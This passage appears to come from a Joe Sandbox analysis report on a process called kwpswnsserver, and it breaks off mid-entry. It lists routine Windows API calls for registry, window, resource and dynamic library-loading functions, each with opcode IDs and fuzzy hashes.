                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Fill$Inflate
                                                                  • String ID:
                                                                  • API String ID: 2224923502-0
                                                                  • Opcode ID: 597f603af76555c3b03b6778a5b4e3481d336f563a6d912ffce264245b0b0a05
                                                                  • Instruction ID: 9a3f8c373e3a5a23408b6f6195999236bb8c1a769524b6b0799e6af1c2f02004
                                                                  • Opcode Fuzzy Hash: 597f603af76555c3b03b6778a5b4e3481d336f563a6d912ffce264245b0b0a05
                                                                  • Instruction Fuzzy Hash: DA310C72200259AFDF149F58CD89EAB7BB9FB04355F108515F929C66A0C771DC20CB60
                                                                  Function 6C89ACED Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000,00000000,?,00000000), ref: 6C89AD28
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,00000000,00000000,?,00000000), ref: 6C89AD54
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,00000000,00000000,?,00000000), ref: 6C89AD80
                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89AD92
                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000), ref: 6C89ADA1
                                                                    • Part of subcall function 6C89A5BA: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 6C89A5CB
                                                                    • Part of subcall function 6C89A5BA: GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6C89A5DB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreate$AddressHandleModuleOpenProc
                                                                  • String ID: software
                                                                  • API String ID: 550756860-2010147023
                                                                  • Opcode ID: 2620a22f8115ed97d31e74cebde79f92048624bb754a771e44855cbbc8cd75a7
                                                                  • Instruction ID: d07dc273da121096c07ae629b7c5c01e8317a650a140f2a8cac05fa1d96b718f
                                                                  • Opcode Fuzzy Hash: 2620a22f8115ed97d31e74cebde79f92048624bb754a771e44855cbbc8cd75a7
                                                                  • Instruction Fuzzy Hash: 89214C72E01229BFDF25AE98CD44EFF7B7DEB4570AF108569A905E2510D7308A40CBA0
                                                                  Function 6C900DF1 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C900DF8
                                                                    • Part of subcall function 6C900EE2: __EH_prolog3.LIBCMT ref: 6C900EE9
                                                                    • Part of subcall function 6C900EE2: GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C900F3C
                                                                    • Part of subcall function 6C900EE2: GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C900F52
                                                                  • CopyRect.USER32(?,?), ref: 6C900E2D
                                                                  • GetCursorPos.USER32(?), ref: 6C900E3F
                                                                  • SetRect.USER32(?,?,?,?,?), ref: 6C900E52
                                                                  • IsRectEmpty.USER32(?), ref: 6C900E6D
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C900E7F
                                                                  • DoDragDrop.OLE32(00000000,00000000,?,?), ref: 6C900EC7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Profile$CopyCursorDragDropEmptyH_prolog3H_prolog3_Inflate
                                                                  • String ID:
                                                                  • API String ID: 1837043813-0
                                                                  • Opcode ID: 229bc4d89e5b6ecf2fda5d06404a060b4f11f10bb76ad72b42a988933ad8c72e
                                                                  • Instruction ID: 34fa8adbbdf7228e658b09f14f4758d98d59007d5e08271e20e053201f6bfd1b
                                                                  • Opcode Fuzzy Hash: 229bc4d89e5b6ecf2fda5d06404a060b4f11f10bb76ad72b42a988933ad8c72e
                                                                  • Instruction Fuzzy Hash: 99318C75A012699FCF15DFE8CD488EE7BB9BF45348B004418E805AB704DB34D90ACB60
                                                                  Function 6C8C6DF9 Relevance: 10.6, APIs: 7, Instructions: 68windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 6C8C6E13
                                                                  • DispatchMessageW.USER32(?), ref: 6C8C6E25
                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 6C8C6E33
                                                                  • SetRectEmpty.USER32(?), ref: 6C8C6E5B
                                                                  • GetDesktopWindow.USER32 ref: 6C8C6E73
                                                                  • LockWindowUpdate.USER32(?,00000000), ref: 6C8C6E84
                                                                  • GetDCEx.USER32(?,00000000,00000003), ref: 6C8C6E9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                  • String ID:
                                                                  • API String ID: 1192691108-0
                                                                  • Opcode ID: 56c9afdb94bdb84e55bd3295ff57cd354a9f65dc66e7b1902f59721b288d9647
                                                                  • Instruction ID: 185023beefcbe3d867272946c4aec6f167df8d004e98a00d74a5b74b09918edc
                                                                  • Opcode Fuzzy Hash: 56c9afdb94bdb84e55bd3295ff57cd354a9f65dc66e7b1902f59721b288d9647
                                                                  • Instruction Fuzzy Hash: 55213372B00716ABDB25AFB9CD88A97BFBCFF09654B00453AF119C6941D734E415CB90
                                                                  Function 6C8A0286 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RealChildWindowFromPoint.USER32(?,?,?,?,?,?,6C887DD8,?,?,?), ref: 6C8A02AA
                                                                  • ClientToScreen.USER32(?,?), ref: 6C8A02C4
                                                                  • GetWindow.USER32(?,00000005), ref: 6C8A0316
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ChildClientFromPointRealScreen
                                                                  • String ID:
                                                                  • API String ID: 2518355518-0
                                                                  • Opcode ID: ce6a90f9f46c6a0afd0346ac4c76b916f0f500f812e9b4749e591a073f41edc2
                                                                  • Instruction ID: b59c587dd317a82272abe10ab8d8767f861c7d03b8ea4a65dfdde84358120300
                                                                  • Opcode Fuzzy Hash: ce6a90f9f46c6a0afd0346ac4c76b916f0f500f812e9b4749e591a073f41edc2
                                                                  • Instruction Fuzzy Hash: 4D11DA31A0132AABCF25DFA8CD58EEF77B8AF4A304F108615F806E3140DB34D9428B90
                                                                  Function 6C88E95D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 6C88E974
                                                                  • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 6C88E99C
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 6C88E9AE
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 6C88E9BA
                                                                  • LockResource.KERNEL32(00000000), ref: 6C88E9C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeofWindow
                                                                  • String ID: AFX_DIALOG_LAYOUT
                                                                  • API String ID: 2582447065-2436846380
                                                                  • Opcode ID: 4bfe8fbc9c75e37edab48c1a539dc969024233745b78bea91137078f42e3896a
                                                                  • Instruction ID: 5962b921ed1741ac805f607615641be18a0c14a36bf5b2794973c8a9176b98d7
                                                                  • Opcode Fuzzy Hash: 4bfe8fbc9c75e37edab48c1a539dc969024233745b78bea91137078f42e3896a
                                                                  • Instruction Fuzzy Hash: F211597A302712BFDB705BB4CD48A6F36BCEB45248B100925B905C2A00EBF0DC11C7A0
                                                                  Function 6C8A65FF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,?,6C89DD66,00000001,?,00000002,00000000,?), ref: 6C8A6611
                                                                  • GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 6C8A6621
                                                                  • EncodePointer.KERNEL32(00000000,?,6C89DD66,00000001,?,00000002,00000000,?), ref: 6C8A662A
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89DD66,00000001,?,00000002,00000000,?), ref: 6C8A6638
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: BeginBufferedPaint$uxtheme.dll
                                                                  • API String ID: 2061474489-1632326970
                                                                  • Opcode ID: 3aed26c63f18cad45117ea7f915a2c7e0f957bd2918a5cabdacbbaf6b34c6f52
                                                                  • Instruction ID: e60f8d0c842848220c39a2ee738d1e1ddd25c04ca71f0ed17846334f5ef21941
                                                                  • Opcode Fuzzy Hash: 3aed26c63f18cad45117ea7f915a2c7e0f957bd2918a5cabdacbbaf6b34c6f52
                                                                  • Instruction Fuzzy Hash: 1FF0623564132BEF8F292FA9CD1C85A3BB8BF096557408511FD05D2624DB30C8128BA4
                                                                  Function 6C8A695A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(comctl32.dll), ref: 6C8A696C
                                                                  • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 6C8A697C
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A6985
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6993
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: TaskDialogIndirect$comctl32.dll
                                                                  • API String ID: 2061474489-2809879075
                                                                  • Opcode ID: fc27d572ddd854a77c574a51890d2c73800390d807e6779bc0337684aeb4f187
                                                                  • Instruction ID: 6a198ed1dd9b6b3193b62cea6b1dfedf5537c8250244a16ff8ec7b33e473fad1
                                                                  • Opcode Fuzzy Hash: fc27d572ddd854a77c574a51890d2c73800390d807e6779bc0337684aeb4f187
                                                                  • Instruction Fuzzy Hash: 9AF0907264132AAB8F252FA88D1C85A3AB8BB057457488910FC09D6614D730D9038BE4
                                                                  Function 6C8A640F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(shell32.dll), ref: 6C8A6421
                                                                  • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C8A6431
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A643A
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A6448
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: SHGetKnownFolderPath$shell32.dll
                                                                  • API String ID: 2061474489-2936008475
                                                                  • Opcode ID: 752c6e0cc1afde23fac68efab1da3935950848735610002787193902421374e5
                                                                  • Instruction ID: f1f7f4f3edd7167b33815ec3f1233ca98265514ec5945dc296b7019ab5271a53
                                                                  • Opcode Fuzzy Hash: 752c6e0cc1afde23fac68efab1da3935950848735610002787193902421374e5
                                                                  • Instruction Fuzzy Hash: 80F06D7564232AAF8F256EA88D1C96B3BB8BB05799700C910FD1AE2614D730C8028BA0
                                                                  Function 6C8A6238 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8899BF,?,?,?,?), ref: 6C8A624A
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6C8A625A
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C8899BF,?,?,?,?), ref: 6C8A6263
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C8899BF,?,?,?,?), ref: 6C8A6271
                                                                  Strings
                                                                  • RegisterApplicationRecoveryCallback, xrefs: 6C8A6254
                                                                  • kernel32.dll, xrefs: 6C8A6245
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: RegisterApplicationRecoveryCallback$kernel32.dll
                                                                  • API String ID: 2061474489-202725706
                                                                  • Opcode ID: 32d2a12feb255ed5469a906d811cdaf9b916fe063488888e6abca265770f0e65
                                                                  • Instruction ID: f60822219161ad6f1aed9819e49c38d3e579b40e495a0bef529dd5a7b91e906c
                                                                  • Opcode Fuzzy Hash: 32d2a12feb255ed5469a906d811cdaf9b916fe063488888e6abca265770f0e65
                                                                  • Instruction Fuzzy Hash: 16F0907664132BAB8F252FB88D1CA9A3BB8FB05755300C914FD0DE6604D730D8038BA0
                                                                  Function 6C8A63AA Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(shell32.dll), ref: 6C8A63BC
                                                                  • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 6C8A63CC
                                                                  • EncodePointer.KERNEL32(00000000), ref: 6C8A63D5
                                                                  • DecodePointer.KERNEL32(00000000), ref: 6C8A63E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                  • API String ID: 2061474489-2320870614
                                                                  • Opcode ID: 745ccf668a49560b54cf25ed99e0e7c05eba98d9277cb2664494f0fd9b426924
                                                                  • Instruction ID: 2c6eb516f511374f33ddea46bea44ac382528eae0eae12f931f3a73ad03fdfdb
                                                                  • Opcode Fuzzy Hash: 745ccf668a49560b54cf25ed99e0e7c05eba98d9277cb2664494f0fd9b426924
                                                                  • Instruction Fuzzy Hash: A1F0907164233BAF8F256FA8CD1C95B3BB8BB05745740C910FC09D2604D734C8038BA0
                                                                  Function 6C8A6664 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(uxtheme.dll,?,?,6C89DE4D,?,00000001,E343E0B4), ref: 6C8A6676
                                                                  • GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 6C8A6686
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C89DE4D,?,00000001,E343E0B4), ref: 6C8A668F
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C89DE4D,?,00000001,E343E0B4), ref: 6C8A669D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: EndBufferedPaint$uxtheme.dll
                                                                  • API String ID: 2061474489-2993015961
                                                                  • Opcode ID: b8977f43e9205cc55b2bfe9a254085e07d8826ab66d7dac75d41991bf59092ea
                                                                  • Instruction ID: 4976f8b670418e60b5ff5f4ec003df6d16da324ffea142312585aa1d68358ab1
                                                                  • Opcode Fuzzy Hash: b8977f43e9205cc55b2bfe9a254085e07d8826ab66d7dac75d41991bf59092ea
                                                                  • Instruction Fuzzy Hash: F6F05E7164133BEF8F252AA9CD1C94A3BB8AB066553408925FD19D7624EB308C438AA4
                                                                  Function 6C8A61D9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C8899A3,?,?), ref: 6C8A61EB
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterApplicationRestart), ref: 6C8A61FB
                                                                  • EncodePointer.KERNEL32(00000000,?,?,6C8899A3,?,?), ref: 6C8A6204
                                                                  • DecodePointer.KERNEL32(00000000,?,?,6C8899A3,?,?), ref: 6C8A6212
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeHandleModuleProc
                                                                  • String ID: RegisterApplicationRestart$kernel32.dll
                                                                  • API String ID: 2061474489-1259503209
                                                                  • Opcode ID: 69a32966f5368f0aea2cda25c87aea173b131ffa60d08f49c25b303a99b088ea
